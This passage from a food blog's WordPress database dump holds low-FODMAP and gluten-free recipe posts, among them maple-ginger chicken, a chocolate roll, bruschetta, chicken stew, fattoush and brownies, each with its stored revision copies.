So, as I\'m back on the meat....sometimes, I\'m going from salads to these really moorish sticky chicken drumsticks :) . I\'ve actually taken inspiration from Jamie Oliver as I saw his recipe and it just looked so good. I\'ve made some minor adjustment to make it Tummy Friendly. Honey can be an irritant to sensitive tummies, so I\'ve swapped the honey for maple syrup. I find Maple syrup is the best replacement for Honey in most cases. You can also use golden syrup or brown sugar as a replacement but if you need a runny consistency you\'ll have to mix the brown sugar with a bit of water.

For the best result leave the chicken to marinade over night for about 24 hours. It\'ll give the chicken time to soak up all the lovely flavours from the marinade.

\n\n\n\n
\"\"/
\n\n\n\n

They taste great grilled on the BBQ but as it\'s winter for many of you, it might not be an ideal time to get the BBQ out. Luckily they also taste great cooked in in a griddle pan or in the oven too. 

\n\n\n\n

INGREDIENTS 

\n\n\n\n

500g free range chicken drumsticks

MAPLE AND GINGER MARINADE
5 spring onions , finely sliced
5 tbsp maple syrup
2 tbsp soy sauce or tamarin
1 red chilli , sliced
1-2 cm piece of ginger, grated

Some chives to sprinkle on top once grilled (optional)

1. Put all the marinade ingredients in a large re-sealable plastic bag. Close the bag and shake to combine all the ingredients. 
2. Open the bag, drop in the chicken drumsticks in the bag. Close and shake the bag to coat evenly. Place in the fridge to marinate for 24 hours.
3. Heat your barbecue or griddle pan. When the grill is hot, place the chicken on the grill and cook for about 4 minutes per side, for 25-30 minutes until cooked through or until the chicken\'s turned dark and the juices run clear. You can also bake the chicken in a 190 degree C /375 degree F oven for 25-30 minutes minutes, or until cooked through.
4. Sprinkle some chopped up chives on top.

\n\n\n\n

 Enjoy!

\n','Sticky maple and ginger glazed chicken','','publish','open','open','','sticky-maple-and-ginger-glazed-chicken','','','2020-04-06 23:14:15','2020-04-06 23:14:15','',0,'http://tummyrevolution.com/?p=4746',0,'post','',0),(4747,1,'2020-04-05 00:23:19','2020-04-05 00:23:19','\n

In January I decided to go vegetarian for a month to mainly explore eating more vegetables but also to see how it made me feel health wise. Initially I really enjoyed it and my tummy did too. I tried some great new vegetarian recipes out and generally ate more vegetables (I already eat a lot of fruit). After a few weeks I started to realise there were some challenges too. With wheat being one of my trigger foods I found eating out a real challenge. In restaurants I found that most vegetarian dishes contained wheat/gluten and sometimes there were hardly anything I could eat and I ended up eating something not very nutritious like nachos because that\'s all I could have. I found being a wheat/gluten free vegetarian required a lot of planning and in order to stay healthy. As a busy mum of two I didn\'t always have the time to plan meals as well as I probably should have in order to stay healthy. I have therefore decided to continue as a flexitarian :) I will aim to eat vegetarian food as much as possible but on some days and in some situations I will have meat if that\'s a better nutritional choice for me.
I\'d be interested in hearing if anyone else\'s had a similar experience or how they\'ve dealt with the transition or eating meat to becoming a vegetarian.

\n\n\n\n

So, as I\'m back on the meat....sometimes, I\'m going from salads to these really moorish sticky chicken drumsticks :) . I\'ve actually taken inspiration from Jamie Oliver as I saw his recipe and it just looked so good. I\'ve made some minor adjustment to make it Tummy Friendly. Honey can be an irritant to sensitive tummies, so I\'ve swapped the honey for maple syrup. I find Maple syrup is the best replacement for Honey in most cases. You can also use golden syrup or brown sugar as a replacement but if you need a runny consistency you\'ll have to mix the brown sugar with a bit of water.

For the best result leave the chicken to marinade over night for about 24 hours. It\'ll give the chicken time to soak up all the lovely flavours from the marinade.

\n\n\n\n
\"\"/
\n\n\n\n

They taste great grilled on the BBQ but as it\'s winter for many of you, it might not be an ideal time to get the BBQ out. Luckily they also taste great cooked in in a griddle pan or in the oven too. 

\n\n\n\n

INGREDIENTS 

\n\n\n\n

500g free range chicken drumsticks

MAPLE AND GINGER MARINADE
5 spring onions , finely sliced
5 tbsp maple syrup
2 tbsp soy sauce or tamarin
1 red chilli , sliced
1-2 cm piece of ginger, grated

Some chives to sprinkle on top once grilled (optional)

1. Put all the marinade ingredients in a large re-sealable plastic bag. Close the bag and shake to combine all the ingredients. 
2. Open the bag, drop in the chicken drumsticks in the bag. Close and shake the bag to coat evenly. Place in the fridge to marinate for 24 hours.
3. Heat your barbecue or griddle pan. When the grill is hot, place the chicken on the grill and cook for about 4 minutes per side, for 25-30 minutes until cooked through or until the chicken\'s turned dark and the juices run clear. You can also bake the chicken in a 190 degree C /375 degree F oven for 25-30 minutes minutes, or until cooked through.
4. Sprinkle some chopped up chives on top.

\n\n\n\n

 Enjoy!

\n','Sticky maple and ginger glazed chicken','','inherit','closed','closed','','4746-revision-v1','','','2020-04-05 00:23:19','2020-04-05 00:23:19','',4746,'http://tummyrevolution.com/4746-revision-v1/',0,'revision','',0),(4748,1,'2020-04-05 00:23:35','2020-04-05 00:23:35','\n
\"\"/
\n\n\n\n

This week I\'m back in Sweden visiting my family for Easter. It\'s safe to say spring has NOT arrived to Sweden yet. It\'s absolutely freezing and there\'s still snow in many places. It\'s very hard to get used to the cold when you come directly from Dubai so I\'m wearing about 6 layers of cloths to keep me warm if I go outside.

It\'s lovely spending time with my family and I especially enjoy some time with my mum in the kitchen as we both enjoy cooking and baking. My mum is a very, very good cook and baker. She\'s definitely one of my biggest inspirations. She\'s a bit like a living cookery book in that she seems to knows everything. I guess you could say she\'s quite traditional when it comes to her baking and cooking but she mixes it with new things too and I like that. I was just 19 years old when I moved to the UK and by that time I wasn\'t really that interested in cooking and could hardly fry and egg so when I get that chance to spend some time with my mum these days I try to catch up on all the knowledge I missed out on when I moved away.

\n\n\n\n
\"\"/
\n\n\n\n


MUM AND DAD

\n\n\n\n

My mum is not really used to gluten free cooking/baking but she\'s happy to give it a try when I\'m at home. We made this great chocolate roll cake that\'s gluten free. It was also my nice\'s birthday so we thought some kind of cake was definitely   needed.

\n\n\n\n
\"\"/
\n\n\n\n

I really like making roll cakes like this one because they\'re quick to make (only ca 5 min in the oven) and you can fill them so many yummy things like fruits, berries, nuts, jam, cream etc. to add your own touch to it.

\n\n\n\n

The cream and raspberries taste surprisingly good together with the chocolate in this cake. I hope you enjoy it too!

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS
3 large eggs
150ml / 0.6cup caster sugar
5 tbsp corn starch
3 tbsp cacao powder
1 tsp baking powder

\n\n\n\n

FILLING
2dl whipping cream / coconut cream
200g raspberries

\n\n\n\n

INSTRUCTIONS
1. Preheat the oven to 220 C / 430 F
2. Line a baking tray with grease proof baking paper.
3. Whisk the eggs and sugar until the mixture is pale yellow, thick and fluffy.
4. Mix the corn starch, cacao, and baking powder. Fold the flour mix into the egg mix and carefully, making sure it\'s all mixed together.
5. Spread the mix out on the lined baking tray. The mix should be equally spread over the whole baking tray.
6. Bake in the oven for about 5 minutes. Careful not to burn it.
7. Sprinkle some sugar over the surface of the cake. 
8. Place some greased baking paper on a clean kitchen surface. Turn the cake over onto the baking paper. The cake is now upside down with baking paper on top of it. Brush some water onto the baking paper and carefully remove it. Let the cake cool under a clean tea towel.
9. Whip the cream and stir in the raspberries. You can mash up the raspberries a bit if they are big. 
10. Spread out the cram mix onto the cake and spread it out.
11. Carefully Roll up the cake (from the long end) and leave it for a minute before  slicing.

\n\n\n\n
\"\"/
\n','Gluten free chocolate roll with raspberry cream','','inherit','closed','closed','','4745-revision-v1','','','2020-04-05 00:23:35','2020-04-05 00:23:35','',4745,'http://tummyrevolution.com/4745-revision-v1/',0,'revision','',0),(4749,1,'2020-04-05 00:24:12','2020-04-05 00:24:12','\n

I love love bruschetta al pomodoro. It\'s that mixture of lovely fresh ripe tomatoes, oregano, basil, olive oil and garlic that makes it so tasty. But some people are sensitive to garlic as it\'s one of those foods that can upset a sensitive gut. My way around this is to substitute the garlic and olive oil with garlic infused oil instead. It works really well and you\'ll be supriced how much garlic favour the garlic infused oil will provide without upsetting your gut. I make this dish for lunch on a regular basis as it\'s quick, healthy and very tasty.

I tend to serve the tomato mix on homemade gluten free bread. I actually cheat a little by using a bread machine a relative gave me for christmas. Prior to being given this machine I must admit that I was\'t keen on using one. I liked making my own bread by hand, but as you know, it does take some time to make bread this way, time which I did\'t have that often which meant I  often ended up buying gluten free bread instead of making it. Now that I have the bread machine I hardly ever buy gluten free bread because it\'s so easy to make it in the machine. You simply pop in all the ingredients and press a button. A couple of hours later your freshly made bread is ready and it\'s looovely. By making it myself I know exactly what goes into it and I can add lots of seeds and nuts to make it more tasty and healthy. I would definitely recommend investing in a bread machine. It\'s honestly one of my best gifts of all times :)

\n\n\n\n

INGREDIENTS
(makes 1 portion)

\n\n\n\n
  • 5 cherry or 3-4 plum tomatoes
  • 3-4 leaves chopped fresh basil
  • 1-2 tablespoon garlic infused olive oil
  • 1 pinch salt
  • 1 pinch ground black pepper
  • 1-2 slices gluten free bread 

    INSTRUCTIONS
\n\n\n\n
  1. In a mixing bowl, combine the tomatoes, basil, garlic, oregano, salt, pepper and garlic infused olive oil. Use more olive oil, if necessary, to coat the entire mixture. Allow the mixture to sit for 10 minutes

  2. Toast your gluten free bread. Speak the tomato mixture on the slices and serve
\n\n\n\n

 ENJOY!!

\n\n\n\n
\"\"/
\n','Tummy friendly Bruschetta al pomodoro','','publish','open','open','','tummy-friendly-bruschetta-al-pomodoro','','','2020-04-06 23:13:31','2020-04-06 23:13:31','',0,'http://tummyrevolution.com/?p=4749',0,'post','',0),(4750,1,'2020-04-05 00:24:31','2020-04-05 00:24:31','\n

A few weeks ago we went skiing in Georgia. Being based in Dubai, Georgia (former USSR) is only 3.5 hours flight away so ideal for us. We’d initially thought of going to Europe but thought Georgia would be an adventure and took a chance going there. We didn\'t know what to expect but it turned out to be an amazing week with fantastic weather and skiing.

\n\n\n\n
\"\"/
\n\n\n\n

Skiing in Georgia

\n\n\n\n

We also enjoyed sampling some Georgian food and I really loved their stews so I was inspired to cook a stew when we got back and made this chicken stew. Stews are so comforting in winter, especially for sensitive tummies. I also like how easy they generally are to make. You simply put all the ingredients in a pot and let the stove do all the work. The flavours gets infused and you end up with something really yummy. If you end up with leftovers, you should consider yourself lucky as stews are almost tastier the next day.

\n\n\n\n

I hope you like this tummy friendly Chicken stew

\n\n\n\n

INGREDIENTS
50g unsalted butter
ca 1.5 kg chicken thighs and drumsticks (or a whole chicken cut up in pices)
100g streaky bacon, cut into 1 cm strips
2 leeks (green part only), finely chopped
300ml white wine
2tbsp caster sugar
1 tsp lemon juice
3 tbsp Dijon mustard
300ml lactose free cream
salt and pepper for seasoning

4-5 Potatoes for potato wedges
olive oil

\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Preheat the oven to 170°C/340°F

  2. Melt the butter in an oven proof casserole pot (make sure it has a lid for later). Season the chicken and cook on medium to high heat for two minutes each side or until golden brown. Remove the chicken from the pot and set aside.

  3. Add the bacon and cook for about 3 minutes, then add the leek (green part only) and cook for another 3 minutes stirring occasionally. Add the chicken back to the casserole and pour in the wine. Bring to the boil, then cover with a lid and roast for 1 hour 10 minutes or until chicken is cooked through. The cooking tie might be slightly shorter if you have small chicken pieces. Alternatively simmer the chicken on the top of the stove for the same amount of time

  4. In the final 40 minutes of roasting, cut your potatoes into wedges, toss them in some olive oil and season with salt and pepper. Roast in the oven for 40 minutes, then take the stew out and turn up the heat to 220°C/425°F and continue roasting the potato wedges for another 10-15 minutes or until golden brown.

  5. Add the potato wedges to your stew and serve immidiately.

    If you have a small oven and can’t fit both the chicken stew and the potato wedges in the oven, I suggest you let the chicken stew simmer on top of the stove for the same amount of time instead of cooking it in the oven. That will give you space to cook the potato wedges
\n\n\n\n
\"\"/
\n','Creamy chicken stew - Low FODMAP','','publish','open','open','','creamy-chicken-stew-low-fodmap','','','2020-04-06 23:13:08','2020-04-06 23:13:08','',0,'http://tummyrevolution.com/?p=4750',0,'post','',0),(4751,1,'2020-04-05 00:24:12','2020-04-05 00:24:12','\n

I love love bruschetta al pomodoro. It\'s that mixture of lovely fresh ripe tomatoes, oregano, basil, olive oil and garlic that makes it so tasty. But some people are sensitive to garlic as it\'s one of those foods that can upset a sensitive gut. My way around this is to substitute the garlic and olive oil with garlic infused oil instead. It works really well and you\'ll be supriced how much garlic favour the garlic infused oil will provide without upsetting your gut. I make this dish for lunch on a regular basis as it\'s quick, healthy and very tasty.

I tend to serve the tomato mix on homemade gluten free bread. I actually cheat a little by using a bread machine a relative gave me for christmas. Prior to being given this machine I must admit that I was\'t keen on using one. I liked making my own bread by hand, but as you know, it does take some time to make bread this way, time which I did\'t have that often which meant I  often ended up buying gluten free bread instead of making it. Now that I have the bread machine I hardly ever buy gluten free bread because it\'s so easy to make it in the machine. You simply pop in all the ingredients and press a button. A couple of hours later your freshly made bread is ready and it\'s looovely. By making it myself I know exactly what goes into it and I can add lots of seeds and nuts to make it more tasty and healthy. I would definitely recommend investing in a bread machine. It\'s honestly one of my best gifts of all times :)

\n\n\n\n

INGREDIENTS
(makes 1 portion)

\n\n\n\n
  • 5 cherry or 3-4 plum tomatoes
  • 3-4 leaves chopped fresh basil
  • 1-2 tablespoon garlic infused olive oil
  • 1 pinch salt
  • 1 pinch ground black pepper
  • 1-2 slices gluten free bread 

    INSTRUCTIONS
\n\n\n\n
  1. In a mixing bowl, combine the tomatoes, basil, garlic, oregano, salt, pepper and garlic infused olive oil. Use more olive oil, if necessary, to coat the entire mixture. Allow the mixture to sit for 10 minutes

  2. Toast your gluten free bread. Speak the tomato mixture on the slices and serve
\n\n\n\n

 ENJOY!!

\n\n\n\n
\"\"/
\n','Tummy friendly Bruschetta al pomodoro','','inherit','closed','closed','','4749-revision-v1','','','2020-04-05 00:24:12','2020-04-05 00:24:12','',4749,'http://tummyrevolution.com/4749-revision-v1/',0,'revision','',0),(4752,1,'2020-04-05 00:24:31','2020-04-05 00:24:31','\n

A few weeks ago we went skiing in Georgia. Being based in Dubai, Georgia (former USSR) is only 3.5 hours flight away so ideal for us. We’d initially thought of going to Europe but thought Georgia would be an adventure and took a chance going there. We didn\'t know what to expect but it turned out to be an amazing week with fantastic weather and skiing.

\n\n\n\n
\"\"/
\n\n\n\n

Skiing in Georgia

\n\n\n\n

We also enjoyed sampling some Georgian food and I really loved their stews so I was inspired to cook a stew when we got back and made this chicken stew. Stews are so comforting in winter, especially for sensitive tummies. I also like how easy they generally are to make. You simply put all the ingredients in a pot and let the stove do all the work. The flavours gets infused and you end up with something really yummy. If you end up with leftovers, you should consider yourself lucky as stews are almost tastier the next day.

\n\n\n\n

I hope you like this tummy friendly Chicken stew

\n\n\n\n

INGREDIENTS
50g unsalted butter
ca 1.5 kg chicken thighs and drumsticks (or a whole chicken cut up in pices)
100g streaky bacon, cut into 1 cm strips
2 leeks (green part only), finely chopped
300ml white wine
2tbsp caster sugar
1 tsp lemon juice
3 tbsp Dijon mustard
300ml lactose free cream
salt and pepper for seasoning

4-5 Potatoes for potato wedges
olive oil

\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Preheat the oven to 170°C/340°F

  2. Melt the butter in an oven proof casserole pot (make sure it has a lid for later). Season the chicken and cook on medium to high heat for two minutes each side or until golden brown. Remove the chicken from the pot and set aside.

  3. Add the bacon and cook for about 3 minutes, then add the leek (green part only) and cook for another 3 minutes stirring occasionally. Add the chicken back to the casserole and pour in the wine. Bring to the boil, then cover with a lid and roast for 1 hour 10 minutes or until chicken is cooked through. The cooking tie might be slightly shorter if you have small chicken pieces. Alternatively simmer the chicken on the top of the stove for the same amount of time

  4. In the final 40 minutes of roasting, cut your potatoes into wedges, toss them in some olive oil and season with salt and pepper. Roast in the oven for 40 minutes, then take the stew out and turn up the heat to 220°C/425°F and continue roasting the potato wedges for another 10-15 minutes or until golden brown.

  5. Add the potato wedges to your stew and serve immidiately.

    If you have a small oven and can’t fit both the chicken stew and the potato wedges in the oven, I suggest you let the chicken stew simmer on top of the stove for the same amount of time instead of cooking it in the oven. That will give you space to cook the potato wedges
\n\n\n\n
\"\"/
\n','Creamy chicken stew - Low FODMAP','','inherit','closed','closed','','4750-revision-v1','','','2020-04-05 00:24:31','2020-04-05 00:24:31','',4750,'http://tummyrevolution.com/4750-revision-v1/',0,'revision','',0),(4753,1,'2020-04-05 20:44:11','2020-04-05 20:44:11','\n

Great article from \'The Daily Mail\', giving us a further insight to our \'second brain!\'

\n\n\n\n
\nhttp://www.dailymail.co.uk/health/article-4823890/Anxious-gut-bacteria-blame.html\n
\n','Anxious? Your gut may be to blame!','','publish','open','open','','anxious-your-gut-may-be-to-blame','','','2020-04-13 01:48:23','2020-04-13 01:48:23','',0,'http://tummyrevolution.com/?p=4753',0,'post','',0),(4756,1,'2020-04-05 20:44:01','2020-04-05 20:44:01','\n

Fattoush... don\'t you just love this word. We had lots of giggles making this dish it is more fun if you say fattooooush. This chopped bread salad is a classic middle Eastern dish usually made with pitta. The summer vegetables add vibrant colour to the dish and the sumac, parsley, mint and lemon give it that traditional zesty middle Eastern tang.

Our idea for a low fodmap version of this dish came from Claire Thomson\'s cook book The five o\'clock apron. Her book is full of imaginative fresh exciting recipes. We took her recipe and made our own Gluten free pitta breads and took out the Garlic to make it Fodmap friendly.

\n\n\n\n
\"\"/
\n\n\n\n

Serves 4 

INGREDIENTS

\n\n\n\n
  • 4 gluten free pita breads 
  • 2 tbsp olive oil 
  • ½ tsp ground sumach
  • 2 gem lettuce, finely chopped
  • ½ cucumber, finely chopped 
  • 2 tomatoes, finely chopped 
  • 6 spring onions, green part only, chopped 
  • 4 radishes, stems removed, finely chopped 
  • ½ cup (10 g) finely chopped fresh parsley leaves, stems removed 
  • salt & pepper
\n\n\n\n

FOR THE DRESSING

\n\n\n\n
  • 1 lemon, juice of
  • ½ cup olive oil 
  • salt and pepper 
  • ½ tsp ground sumac
\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to 175Cº/350Fº 

\n\n\n\n

2. Toast the pita bread in your toaster oven until it is crisp but not browned.

\n\n\n\n

3. Heat 2 tbsp of olive oil in a large pan. Break the pita bread into pieces, and place in the heated oil. Fry briefly until browned, tossing frequently. Add salt, pepper and 1/2 tsp of sumac. Remove the pita pieces from the heat and place on paper towels to drain.

\n\n\n\n

4. In the meantime, combine the chopped gem lettuce, cucumber, tomatoes, spring onions (green part only), radishes and parsley in a large mixing bowl.

\n\n\n\n

5. In a small bowl, mix together the ingredients for the dressing.

\n\n\n\n

6. Pour the dressing over the salad and toss everything together.

\n\n\n\n

Serve and enjoy!

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','Fattoush','','publish','open','open','','fattoush','','','2020-04-05 20:44:03','2020-04-05 20:44:03','',0,'http://tummyrevolution.com/?p=4756',0,'post','',0),(4757,1,'2020-04-05 20:44:01','2020-04-05 20:44:01','\n

Fattoush... don\'t you just love this word. We had lots of giggles making this dish it is more fun if you say fattooooush. This chopped bread salad is a classic middle Eastern dish usually made with pitta. The summer vegetables add vibrant colour to the dish and the sumac, parsley, mint and lemon give it that traditional zesty middle Eastern tang.

Our idea for a low fodmap version of this dish came from Claire Thomson\'s cook book The five o\'clock apron. Her book is full of imaginative fresh exciting recipes. We took her recipe and made our own Gluten free pitta breads and took out the Garlic to make it Fodmap friendly.

\n\n\n\n
\"\"/
\n\n\n\n

Serves 4 

INGREDIENTS

\n\n\n\n
  • 4 gluten free pita breads 
  • 2 tbsp olive oil 
  • ½ tsp ground sumach
  • 2 gem lettuce, finely chopped
  • ½ cucumber, finely chopped 
  • 2 tomatoes, finely chopped 
  • 6 spring onions, green part only, chopped 
  • 4 radishes, stems removed, finely chopped 
  • ½ cup (10 g) finely chopped fresh parsley leaves, stems removed 
  • salt & pepper
\n\n\n\n

FOR THE DRESSING

\n\n\n\n
  • 1 lemon, juice of
  • ½ cup olive oil 
  • salt and pepper 
  • ½ tsp ground sumac
\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to 175Cº/350Fº 

\n\n\n\n

2. Toast the pita bread in your toaster oven until it is crisp but not browned.

\n\n\n\n

3. Heat 2 tbsp of olive oil in a large pan. Break the pita bread into pieces, and place in the heated oil. Fry briefly until browned, tossing frequently. Add salt, pepper and 1/2 tsp of sumac. Remove the pita pieces from the heat and place on paper towels to drain.

\n\n\n\n

4. In the meantime, combine the chopped gem lettuce, cucumber, tomatoes, spring onions (green part only), radishes and parsley in a large mixing bowl.

\n\n\n\n

5. In a small bowl, mix together the ingredients for the dressing.

\n\n\n\n

6. Pour the dressing over the salad and toss everything together.

\n\n\n\n

Serve and enjoy!

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n','Fattoush','','inherit','closed','closed','','4756-revision-v1','','','2020-04-05 20:44:01','2020-04-05 20:44:01','',4756,'http://tummyrevolution.com/4756-revision-v1/',0,'revision','',0),(4758,1,'2020-04-05 20:44:11','2020-04-05 20:44:11','\n

Great article from \'The Daily Mail\', giving us a further insight to our \'second brain!\'

\n\n\n\n
\nhttp://www.dailymail.co.uk/health/article-4823890/Anxious-gut-bacteria-blame.html\n
\n','Anxious? Your gut may be to blame!','','inherit','closed','closed','','4753-revision-v1','','','2020-04-05 20:44:11','2020-04-05 20:44:11','',4753,'http://tummyrevolution.com/4753-revision-v1/',0,'revision','',0),(4759,1,'2020-04-05 20:44:29','2020-04-05 20:44:29','\n

Today is a wonderful day, its baking chocolate Brownie day. Warning Low Fodmappers do not eat the whole tray one or two counts as a low Fodmap serving of chocolate.

These are deliciously yummy with afternoon tea (its how we ate ours) but will work just as fantastic served with whipped cream and fresh raspberries. An exciting FODMAP fact is that whipped cream like chocolate is absolutely fine in small amounts, so you can have 1/2 a cup with your brownies.... fill your boots

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n

Makes 16INGREDIENTS

\n\n\n\n
  • 225g Butter
  • 200g dark chocolate roughly chopped
  • 180g Sugar
  • 1/3 teaspoons baking powder
  • A pinch or salt
  • 100g Gluten free flour
  • 4 eggs
  • 2 teaspoons of cocoa powder
  • 3 tablespoons desiccated coconut
  • 3 tablespoons ground almonds
  • Icing sugar for decoration
\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to 180Cº/350Fº and line a baking tray 20cm x 30cm.

\n\n\n\n

2. Melt the butter in a saucepan.

\n\n\n\n

3. Take the saucepan off the heat and let the chocolate melt into the butter.
4. Mix sugar, baking powder, salt and the Gluten free flour and then stir into the butter and chocolate.
5. Stir in the eggs, cocoa powder, ground almonds and desiccated coconut and mix well until you reach a smooth consistency.
6. Pour mixture into the baking tray and bake in the middle of the oven for 20-23 minutes.
7. Let them cool in the baking tray before sprinkling over the icing sugar and cutting up in pieces.

\n\n\n\n

Enjoy chocolate lovers!\n\n

\n','Chocolate Brownies','','publish','open','open','','chocolate-brownies','','','2020-04-27 10:55:53','2020-04-27 10:55:53','',0,'http://tummyrevolution.com/?p=4759',0,'post','',0),(4760,1,'2020-04-05 20:44:49','2020-04-05 20:44:49','\n

This is just ONE of our recipes from our BBQ menu that is available for you to download today! Just head to our homepage now for more delicious recipes to accompany these great chicken skewers.  And don\'t panic - we all know the UK does not provide reliable BBQ weather.  All recipes can be adapted and all food can be cooked on the hob or in the oven.  Failing that, someone can pick the short straw and stand outside with an umbrella and bring the food in ;)

\n\n\n\n

Marinating chicken is super easy and really adds flavour and moisture to the meat. Simply add all the ingredients to a bag and leave to infuse for as long as you can - ideally overnight for optimum flavour.

\n\n\n\n

Ingredients

\n\n\n\n

2 chicken breasts
1 tbsp white wine vinegar
1 tsp mustard
Half a lime
Half a lemon
3 tbsp brown sugar or maple syrup
1 tsp salt
4 tbsp extra virgin olive oil
2 tbsp soy sauce or tamari
4 skewers

\n\n\n\n

Method

\n\n\n\n

1. Cut the chicken breasts into dice size pieces. 

2. Place a large freezer bag in a bowl or on a plate (this is just a precaution in case the bag leaks once the marinade is in it).

3. Mix all the ingredients, apart from the chicken, together in a mixing bowl. 

4. Pour the mixture into the freezer bag and then add the diced chicken. 

5. Tie a knot in the plastic bag and place in the fridge over night or for a minimum of 4 hours.

6. Fire up that BBQ when you\'re ready to cook!

7. Once the chicken has had time to marinade in the lovely juices, take them out of the fridge and place the diced pieces on skewers, with about 4-5 chicken pieces on each.

8. Place on the BBQ and cook for around 10 minutes on each side, until the meat is cooked through.

\n\n\n\n
\"\"/
\n','Marinated Chicken Skewers','','publish','open','open','','marinated-chicken-skewers','','','2020-04-06 23:23:03','2020-04-06 23:23:03','',0,'http://tummyrevolution.com/?p=4760',0,'post','',0),(4761,1,'2020-04-05 20:44:29','2020-04-05 20:44:29','\n

Today is a wonderful day, its baking chocolate Brownie day. Warning Low Fodmappers do not eat the whole tray one or two counts as a low Fodmap serving of chocolate.

These are deliciously yummy with afternoon tea (its how we ate ours) but will work just as fantastic served with whipped cream and fresh raspberries. An exciting FODMAP fact is that whipped cream like chocolate is absolutely fine in small amounts, so you can have 1/2 a cup with your brownies.... fill your boots

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n

Makes 16INGREDIENTS

\n\n\n\n
  • 225g Butter
  • 200g dark chocolate roughly chopped
  • 180g Sugar
  • 1/3 teaspoons baking powder
  • A pinch or salt
  • 100g Gluten free flour
  • 4 eggs
  • 2 teaspoons of cocoa powder
  • 3 tablespoons desiccated coconut
  • 3 tablespoons ground almonds
  • Icing sugar for decoration
\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to 180Cº/350Fº and line a baking tray 20cm x 30cm.

\n\n\n\n

2. Melt the butter in a saucepan.

\n\n\n\n

3. Take the saucepan off the heat and let the chocolate melt into the butter.
4. Mix sugar, baking powder, salt and the Gluten free flour and then stir into the butter and chocolate.
5. Stir in the eggs, cocoa powder, ground almonds and desiccated coconut and mix well until you reach a smooth consistency.
6. Pour mixture into the baking tray and bake in the middle of the oven for 20-23 minutes.
7. Let them cool in the baking tray before sprinkling over the icing sugar and cutting up in pieces.

\n\n\n\n

Enjoy chocolate lovers!\n\n

\n','Chocolate Brownies','','inherit','closed','closed','','4759-revision-v1','','','2020-04-05 20:44:29','2020-04-05 20:44:29','',4759,'http://tummyrevolution.com/4759-revision-v1/',0,'revision','',0),(4762,1,'2020-04-05 20:44:49','2020-04-05 20:44:49','\n

This is just ONE of our recipes from our BBQ menu that is available for you to download today! Just head to our homepage now for more delicious recipes to accompany these great chicken skewers.  And don\'t panic - we all know the UK does not provide reliable BBQ weather.  All recipes can be adapted and all food can be cooked on the hob or in the oven.  Failing that, someone can pick the short straw and stand outside with an umbrella and bring the food in ;)

\n\n\n\n

Marinating chicken is super easy and really adds flavour and moisture to the meat. Simply add all the ingredients to a bag and leave to infuse for as long as you can - ideally overnight for optimum flavour.

\n\n\n\n

Ingredients

\n\n\n\n

2 chicken breasts
1 tbsp white wine vinegar
1 tsp mustard
Half a lime
Half a lemon
3 tbsp brown sugar or maple syrup
1 tsp salt
4 tbsp extra virgin olive oil
2 tbsp soy sauce or tamari
4 skewers

\n\n\n\n

Method

\n\n\n\n

1. Cut the chicken breasts into dice size pieces. 

2. Place a large freezer bag in a bowl or on a plate (this is just a precaution in case the bag leaks once the marinade is in it).

3. Mix all the ingredients, apart from the chicken, together in a mixing bowl. 

4. Pour the mixture into the freezer bag and then add the diced chicken. 

5. Tie a knot in the plastic bag and place in the fridge over night or for a minimum of 4 hours.

6. Fire up that BBQ when you\'re ready to cook!

7. Once the chicken has had time to marinade in the lovely juices, take them out of the fridge and place the diced pieces on skewers, with about 4-5 chicken pieces on each.

8. Place on the BBQ and cook for around 10 minutes on each side, until the meat is cooked through.

\n\n\n\n
\"\"/
\n','Marinated Chicken Skewers','','inherit','closed','closed','','4760-revision-v1','','','2020-04-05 20:44:49','2020-04-05 20:44:49','',4760,'http://tummyrevolution.com/4760-revision-v1/',0,'revision','',0),(4763,1,'2020-04-05 20:48:12','2020-04-05 20:48:12','\n

The low FODMAP diet has meant that we\'ve tried things we\'d probably wouldn\'t have tried otherwise. It has honestly been very enlightening for us rather then restrictive as it\'s opened our minds to other food, veg and ways to cook them
An example of this is green beans.

\n\n\n\n

Green beans were never our favourite but we have re-discovered this vegetable and realised it can be used in all sorts of ways like in salads, chargrilled or in stews. A new favourite dish are these pan grilled beans with toasted sesame seeds and parmesan cheese. It is simply a divine way of eating green beans - yum!

We simply blanched a handful of green beans in some boiling water for about 3 minutes and drained them well. Next, we put them into the griddle pan with a tiny bit of oil for about 5 minutes. In the meantime, we toasted the sesame seeds in a dry small frying pan, for about 2-3 mins on medium-low heat.  All you then need to do is sprinkle your toasted seeds over your beans and add some grated Parmesan on top - so easy, yet so good!

\n\n\n\n

A fabulous side dish to accompany our BBQ menu that you can download from our homepage today!

\n\n\n\n
\"\"/
\n','Glorious Green Beans','','publish','open','open','','glorious-green-beans','','','2020-04-06 23:22:49','2020-04-06 23:22:49','',0,'http://tummyrevolution.com/?p=4763',0,'post','',0),(4764,1,'2020-04-05 20:48:12','2020-04-05 20:48:12','\n

The low FODMAP diet has meant that we\'ve tried things we\'d probably wouldn\'t have tried otherwise. It has honestly been very enlightening for us rather then restrictive as it\'s opened our minds to other food, veg and ways to cook them
An example of this is green beans.

\n\n\n\n

Green beans were never our favourite but we have re-discovered this vegetable and realised it can be used in all sorts of ways like in salads, chargrilled or in stews. A new favourite dish are these pan grilled beans with toasted sesame seeds and parmesan cheese. It is simply a divine way of eating green beans - yum!

We simply blanched a handful of green beans in some boiling water for about 3 minutes and drained them well. Next, we put them into the griddle pan with a tiny bit of oil for about 5 minutes. In the meantime, we toasted the sesame seeds in a dry small frying pan, for about 2-3 mins on medium-low heat.  All you then need to do is sprinkle your toasted seeds over your beans and add some grated Parmesan on top - so easy, yet so good!

\n\n\n\n

A fabulous side dish to accompany our BBQ menu that you can download from our homepage today!

\n\n\n\n
\"\"/
\n','Glorious Green Beans','','inherit','closed','closed','','4763-revision-v1','','','2020-04-05 20:48:12','2020-04-05 20:48:12','',4763,'http://tummyrevolution.com/4763-revision-v1/',0,'revision','',0),(4765,1,'2020-04-02 20:48:00','2020-04-02 20:48:00','\n

Great news!

\n\n\n\n

